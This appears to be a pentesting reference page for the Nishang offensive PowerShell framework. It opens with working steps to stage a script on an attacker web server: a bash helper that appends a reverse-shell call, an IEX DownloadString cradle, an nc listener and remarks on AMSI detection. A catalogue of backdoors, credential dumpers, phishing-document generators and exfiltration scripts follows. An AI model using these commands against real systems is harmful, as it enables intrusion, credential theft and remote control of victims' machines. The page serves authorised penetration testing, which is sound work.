# Nishang

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.

**Link**: <https://github.com/samratashok/nishang>

Kali also ships it as a package under `/usr/share/nishang/`. Note that the packaged version lags the upstream repository: the listing below has no `Shells`, `Client`, `Bypass`, `MITM` or `ActiveDirectory` directories, all of which appear in the script list further down, so clone from GitHub when you need those.

```
root@kali:~# ls -l /usr/share/nishang/ 
total 48 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Antak-WebShell 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Backdoors 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Escalation 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Execution 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Gather 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Misc 
-rw-r--r-- 1 root root  495 Jun  4 11:14 nishang.psm1 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Pivot 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 powerpreter 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Prasadhak 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Scan 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Utility 
```

The scripts have to be transferred to the target first. Serve them from the attacking machine (for example a web server rooted at `/usr/share/nishang/`) and fetch one from the target, giving `iwr` (Invoke-WebRequest) a full URL and an `-OutFile`; without `-OutFile` it only returns the file's content to the console:

`powershell iwr -uri http://10.10.14.14/{Nishang script} -OutFile script.ps1`

Load the script:

`powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script.ps1`

Two caveats. First, almost every Nishang script only *defines* a function named after the file (for example `Invoke-PowerShellTcp`); run with `-File` as above, it defines that function in a child process which then exits, and nothing visible happens. Either dot-source the file into an interactive session and then call the function by name, or append the function call as the last line of the script before serving it, so that a single download-and-execute both defines and runs it. Second, `-ExecutionPolicy Bypass` only overrides the execution policy, which is not a security boundary; on current Windows builds AMSI and Defender flag most Nishang scripts by signature, so expect them to be blocked unless endpoint protection is off or the script has been modified.
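The staging step described above, worked through on the attacker side as an added example (this is not code from the page or from Nishang). It assumes the Kali path `/usr/share/nishang/` and the attacker address `10.10.14.14` from the page; the listener port 4444, the served file name `rev.ps1` and the stand-in script used for the offline demo are assumptions made for this example.

```bash
#!/usr/bin/env bash
# Attacker-side staging for a Nishang script (example added here; not part of
# Nishang). Assumptions: Nishang lives in /usr/share/nishang (Kali path from
# the page), the attacker host is 10.10.14.14 (from the page); the listener
# port 4444 and the served file name rev.ps1 are chosen for this example.
set -euo pipefail

# stage_nishang SRC DEST INVOCATION
# Copies SRC to DEST and appends INVOCATION as the final line. Nishang scripts
# only define a function; appending the call makes one download-and-execute
# both define and run it. Refuses to append the same call twice.
stage_nishang() {
  local src="$1" dest="$2" invocation="$3"
  [ -f "$src" ] || { echo "no such script: $src" >&2; return 1; }
  if grep -qF -- "$invocation" "$src"; then
    echo "invocation already present in $src; refusing to append twice" >&2
    return 1
  fi
  cp "$src" "$dest"
  printf '\n%s\n' "$invocation" >> "$dest"
}

# cradle LHOST FILE
# Prints the one-liner to run on the target: it downloads http://LHOST/FILE
# and runs it in the *current* process (IEX), so the appended call executes.
cradle() {
  local lhost="$1" file="$2"
  printf "powershell.exe -ExecutionPolicy Bypass -NoProfile -NonInteractive -Command \"IEX (New-Object Net.WebClient).DownloadString('http://%s/%s')\"" \
    "$lhost" "$file"
}

# --- offline demo with a constructed stand-in for Shells/Invoke-PowerShellTcp.ps1 ---
WORK="$(mktemp -d)"
cat > "$WORK/Invoke-PowerShellTcp.ps1" <<'EOF'
function Invoke-PowerShellTcp {
    param([switch]$Reverse, [string]$IPAddress, [int]$Port)
    # stub: the real Nishang function opens the TCP connection here
}
EOF
STAGED="$WORK/rev.ps1"
stage_nishang "$WORK/Invoke-PowerShellTcp.ps1" "$STAGED" \
  'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.14 -Port 4444'
echo "staged: $STAGED"
tail -n 1 "$STAGED"          # the appended call
cradle 10.10.14.14 rev.ps1; echo
```

Against the real script the call is `stage_nishang /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 ./www/rev.ps1 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.14 -Port 4444'`; then serve `./www` on port 80 (for example `python3 -m http.server 80 --directory ./www`), start `nc -lvnp 4444`, and run the printed cradle on the target. Because the cradle uses `IEX` rather than `-File`, the function is defined and called in one process, which is the whole point of appending the invocation.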

## Scripts

Nishang currently contains the following scripts and payloads.

### ActiveDirectory

* [Get-Unconstrained](https://github.com/samratashok/nishang/blob/master/ActiveDirectory/Get-Unconstrained.ps1) – Find computers in Active Directory which have Kerberos unconstrained delegation enabled.

### Antak – the Webshell

* [Antak](https://github.com/samratashok/nishang/tree/master/Antak-WebShell) – Execute PowerShell scripts in memory, run commands, and download and upload files using this webshell.

### Backdoors

* [HTTP-Backdoor](https://github.com/samratashok/nishang/blob/master/Backdoors/HTTP-Backdoor.ps1) – A backdoor which can receive instructions from third-party websites and execute PowerShell scripts in memory.
* [DNS\_TXT\_Pwnage](https://github.com/samratashok/nishang/blob/master/Backdoors/DNS_TXT_Pwnage.ps1) – A backdoor which can receive commands and PowerShell scripts from DNS TXT queries, execute them on a target, and be remotely controlled using the queries.
* [Execute-OnTime](https://github.com/samratashok/nishang/blob/master/Backdoors/Execute-OnTime.ps1) – A backdoor which can execute PowerShell scripts at a given time on a target.
* [Gupt-Backdoor](https://github.com/samratashok/nishang/blob/master/Backdoors/Gupt-Backdoor.ps1) – A backdoor which can receive commands and scripts from a WLAN SSID without connecting to it.
* [Add-ScrnSaveBackdoor](https://github.com/samratashok/nishang/blob/master/Backdoors/Add-ScrnSaveBackdoor.ps1) – A backdoor which can use the Windows screen saver for remote command and script execution.
* [Invoke-ADSBackdoor](https://github.com/samratashok/nishang/blob/master/Backdoors/Invoke-ADSBackdoor.ps1) – A backdoor which can use alternate data streams and the Windows Registry to achieve persistence.
* [Add-RegBackdoor](https://github.com/samratashok/nishang/blob/master/Backdoors/Add-RegBackdoor.ps1) – A backdoor which uses the well-known Image File Execution Options "Debugger" trick to execute a payload in place of Sticky Keys and Utilman (Windows key + U) from the logon screen.
* [Set-RemoteWMI](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1) – Modify permissions of DCOM and WMI namespaces to allow access to a non-admin user.
* [Set-RemotePSRemoting](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemotePSRemoting.ps1) – Modify permissions of PowerShell remoting to allow access to a non-admin user.

### Bypass

* [Invoke-AmsiBypass](https://github.com/samratashok/nishang/blob/master/Bypass/Invoke-AmsiBypass.ps1) – Implementation of publicly known methods to bypass/avoid AMSI.

### Client

* [Out-CHM](https://github.com/samratashok/nishang/blob/master/Client/Out-CHM.ps1) – Create infected CHM files which can execute PowerShell commands and scripts.
* [Out-Word](https://github.com/samratashok/nishang/blob/master/Client/Out-Word.ps1) – Create Word files and infect existing ones to run PowerShell commands and scripts.
* [Out-Excel](https://github.com/samratashok/nishang/blob/master/Client/Out-Excel.ps1) – Create Excel files and infect existing ones to run PowerShell commands and scripts.
* [Out-HTA](https://github.com/samratashok/nishang/blob/master/Client/Out-HTA.ps1) – Create an HTA file which can be deployed on a web server and used in phishing campaigns.
* [Out-Java](https://github.com/samratashok/nishang/blob/master/Client/Out-Java.ps1) – Create signed JAR files which can be used with applets for script and command execution.
* [Out-Shortcut](https://github.com/samratashok/nishang/blob/master/Client/Out-Shortcut.ps1) – Create shortcut files capable of executing PowerShell commands and scripts.
* [Out-WebQuery](https://github.com/samratashok/nishang/blob/master/Client/Out-WebQuery.ps1) – Create IQY files for phishing credentials and SMB hashes.
* [Out-JS](https://github.com/samratashok/nishang/blob/master/Client/Out-JS.ps1) – Create JS files capable of executing PowerShell commands and scripts.
* [Out-SCT](https://github.com/samratashok/nishang/blob/master/Client/Out-SCT.ps1) – Create SCT files capable of executing PowerShell commands and scripts.
* [Out-SCF](https://github.com/samratashok/nishang/blob/master/Client/Out-SCF.ps1) – Create an SCF file which can be used for capturing NTLM challenge-response hashes.

### Escalation

* [Enable-DuplicateToken](https://github.com/samratashok/nishang/blob/master/Escalation/Enable-DuplicateToken.ps1) – Duplicate a SYSTEM token into the current session when SYSTEM privileges are required (needs local administrator rights).
* [Remove-Update](https://github.com/samratashok/nishang/blob/master/Escalation/Remove-Update.ps1) – Introduce vulnerabilities by removing patches.
* [Invoke-PsUACme](https://github.com/samratashok/nishang/blob/master/Escalation/Invoke-PsUACme.ps1) – Bypass UAC.

### Execution

* [Download-Execute-PS](https://github.com/samratashok/nishang/blob/master/Execution/Download-Execute-PS.ps1) – Download and execute a PowerShell script in memory.
* [Download\_Execute](https://github.com/samratashok/nishang/blob/master/Execution/Download_Execute.ps1) – Download an executable in text format, convert it back to an executable, and execute it.
* [Execute-Command-MSSQL](https://github.com/samratashok/nishang/blob/master/Execution/Execute-Command-MSSQL.ps1) – Run PowerShell commands, native commands, or SQL commands on an MSSQL Server, given sufficient privileges.
* [Execute-DNSTXT-Code](https://github.com/samratashok/nishang/blob/master/Execution/Execute-DNSTXT-Code.ps1) – Execute shellcode in memory using DNS TXT queries.
* [Out-RundllCommand](https://github.com/samratashok/nishang/blob/master/Execution/Out-RundllCommand.ps1) – Execute PowerShell commands and scripts or a reverse PowerShell session using rundll32.exe.

### Gather

* [Check-VM](https://github.com/samratashok/nishang/blob/master/Gather/Check-VM.ps1) – Check whether the target is a virtual machine.
* [Copy-VSS](https://github.com/samratashok/nishang/blob/master/Gather/Copy-VSS.ps1) – Copy the SAM file using the Volume Shadow Copy Service.
* [Invoke-CredentialsPhish](https://github.com/samratashok/nishang/blob/master/Gather/Invoke-CredentialsPhish.ps1) – Prompt the user with a credential dialog to capture credentials in plain text.
* [FireBuster](https://github.com/samratashok/nishang/blob/master/Gather/FireBuster.ps1) / [FireListener](https://github.com/samratashok/nishang/blob/master/Gather/FireListener.ps1) – A pair of scripts for egress testing.
* [Get-Information](https://github.com/samratashok/nishang/blob/master/Gather/Get-Information.ps1) – Get juicy information from a target.
* [Get-LSASecret](https://github.com/samratashok/nishang/blob/master/Gather/Get-LSASecret.ps1) – Get LSA secrets from a target.
* [Get-PassHashes](https://github.com/samratashok/nishang/blob/master/Gather/Get-PassHashes.ps1) – Get password hashes from a target.
* [Get-WLAN-Keys](https://github.com/samratashok/nishang/blob/master/Gather/Get-WLAN-Keys.ps1) – Get WLAN keys in plain text from a target.
* [Keylogger](https://github.com/samratashok/nishang/blob/master/Gather/Keylogger.ps1) – Log keystrokes from a target.
* [Invoke-MimikatzWdigestDowngrade](https://github.com/samratashok/nishang/blob/master/Gather/Invoke-MimikatzWDigestDowngrade.ps1) – Dump user passwords in plain text on Windows 8.1 and Server 2012 by re-enabling WDigest.
* [Get-PassHints](https://github.com/samratashok/nishang/blob/master/Gather/Get-PassHints.ps1) – Get password hints of Windows users from a target.
* [Show-TargetScreen](https://github.com/samratashok/nishang/blob/master/Gather/Show-TargetScreen.ps1) – Connect back and stream the target screen using MJPEG.
* [Invoke-Mimikatz](https://github.com/samratashok/nishang/blob/master/Gather/Invoke-Mimikatz.ps1) – Load mimikatz in memory. Updated and with some customisation.
* [Invoke-Mimikittenz](https://github.com/samratashok/nishang/blob/master/Gather/Invoke-Mimikittenz.ps1) – Extract juicy information from target process memory (like browsers) using regex.
* [Invoke-SSIDExfil](https://github.com/samratashok/nishang/blob/master/Gather/Invoke-SSIDExfil.ps1) – Exfiltrate information such as user credentials using a WLAN SSID.
* [Invoke-SessionGopher](https://github.com/samratashok/nishang/blob/master/Gather/Invoke-SessionGopher.ps1) – Identify admin jump-boxes and/or computers used to access Unix machines by harvesting saved remote-access session information.

### MITM

* [Invoke-Interceptor](https://github.com/samratashok/nishang/blob/master/MITM/Invoke-Interceptor.ps1) – A local HTTPS proxy for MITM attacks.

### Pivot

* [Create-MultipleSessions](https://github.com/samratashok/nishang/blob/master/Pivot/Create-MultipleSessions.ps1) – Check credentials on multiple computers and create PSSessions.
* [Run-EXEonRemote](https://github.com/samratashok/nishang/blob/master/Pivot/Run-EXEonRemote.ps1) – Copy and execute an executable on multiple machines.
* [Invoke-NetworkRelay](https://github.com/samratashok/nishang/blob/master/Pivot/Invoke-NetworkRelay.ps1) – Create network relays between computers.

### Prasadhak

* [Prasadhak](https://github.com/samratashok/nishang/blob/master/Prasadhak/Prasadhak.ps1) – Check the hashes of running processes against the VirusTotal database.

### Scan

* [Brute-Force](https://github.com/samratashok/nishang/blob/master/Scan/Brute-Force.ps1) – Brute force FTP, Active Directory, MSSQL, and SharePoint credentials.
* [Port-Scan](https://github.com/samratashok/nishang/blob/master/Scan/Port-Scan.ps1) – A handy port scanner.

### Powerpreter

* [Powerpreter](https://github.com/samratashok/nishang/tree/master/powerpreter) – All the functionality of Nishang in a single script module.

### Shells

* [Invoke-PsGcat](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PsGcat.ps1) – Send commands and scripts to a specified Gmail account to be executed by Invoke-PsGcatAgent.
* [Invoke-PsGcatAgent](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PsGcatAgent.ps1) – Execute commands and scripts sent by Invoke-PsGcat.
* [Invoke-PowerShellTcp](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1) – An interactive PowerShell reverse-connect or bind shell over TCP.
* [Invoke-PowerShellTcpOneLine](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1) – Stripped-down version of Invoke-PowerShellTcp. Also contains a skeleton version which could fit in two tweets.
* [Invoke-PowerShellTcpOneLineBind](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLineBind.ps1) – Bind version of Invoke-PowerShellTcpOneLine.
* [Invoke-PowerShellUdp](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellUdp.ps1) – An interactive PowerShell reverse-connect or bind shell over UDP.
* [Invoke-PowerShellUdpOneLine](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellUdpOneLine.ps1) – Stripped-down version of Invoke-PowerShellUdp.
* [Invoke-PoshRatHttps](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PoshRatHttps.ps1) – Reverse interactive PowerShell over HTTPS.
* [Invoke-PoshRatHttp](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PoshRatHttp.ps1) – Reverse interactive PowerShell over HTTP.
* [Remove-PoshRat](https://github.com/samratashok/nishang/blob/master/Shells/Remove-PoshRat.ps1) – Clean the system after using Invoke-PoshRatHttps.
* [Invoke-PowerShellWmi](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellWmi.ps1) – Interactive PowerShell using WMI.
* [Invoke-PowerShellIcmp](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellIcmp.ps1) – An interactive PowerShell reverse shell over ICMP.
* [Invoke-JSRatRundll](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-JSRatRundll.ps1) – An interactive PowerShell reverse shell over HTTP using rundll32.exe.
* [Invoke-JSRatRegsvr](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-JSRatRegsvr.ps1) – An interactive PowerShell reverse shell over HTTP using regsvr32.exe.

### Utility

* [Add-Exfiltration](https://github.com/samratashok/nishang/blob/master/Utility/Add-Exfiltration.ps1) – Add data exfiltration capability (to Gmail, Pastebin, a web server, or DNS) to any script.
* [Add-Persistence](https://github.com/samratashok/nishang/blob/master/Utility/Add-Persistence.ps1) – Add reboot persistence capability to a script.
* [Remove-Persistence](https://github.com/samratashok/nishang/blob/master/Utility/Remove-Persistence.ps1) – Remove persistence added by the Add-Persistence script.
* [Do-Exfiltration](https://github.com/samratashok/nishang/blob/master/Utility/Do-Exfiltration.ps1) – Pipe (|) the output of any script to this to exfiltrate it.
* [Download](https://github.com/samratashok/nishang/blob/master/Utility/Download.ps1) – Transfer a file to the target.
* [Parse\_Keys](https://github.com/samratashok/nishang/blob/master/Utility/Parse_Keys.ps1) – Parse keys logged by the keylogger.
* [Invoke-Encode](https://github.com/samratashok/nishang/blob/master/Utility/Invoke-Encode.ps1) – Encode and compress a script or string.
* [Invoke-Decode](https://github.com/samratashok/nishang/blob/master/Utility/Invoke-Decode.ps1) – Decode and decompress a script or string from Invoke-Encode.
* [Start-CaptureServer](https://github.com/samratashok/nishang/blob/master/Utility/Start-CaptureServer.ps1) – Run a web server which logs Basic authentication credentials and SMB (NTLM) hashes.
* [ConvertTo-ROT13](https://github.com/samratashok/nishang/blob/master/Utility/ConvertTo-ROT13.ps1) – Encode a string to ROT13 or decode a ROT13 string.
* [Out-DnsTxt](https://github.com/samratashok/nishang/blob/master/Utility/Out-DnsTxt.ps1) – Generate DNS TXT records which can be used with the other DNS-based scripts.
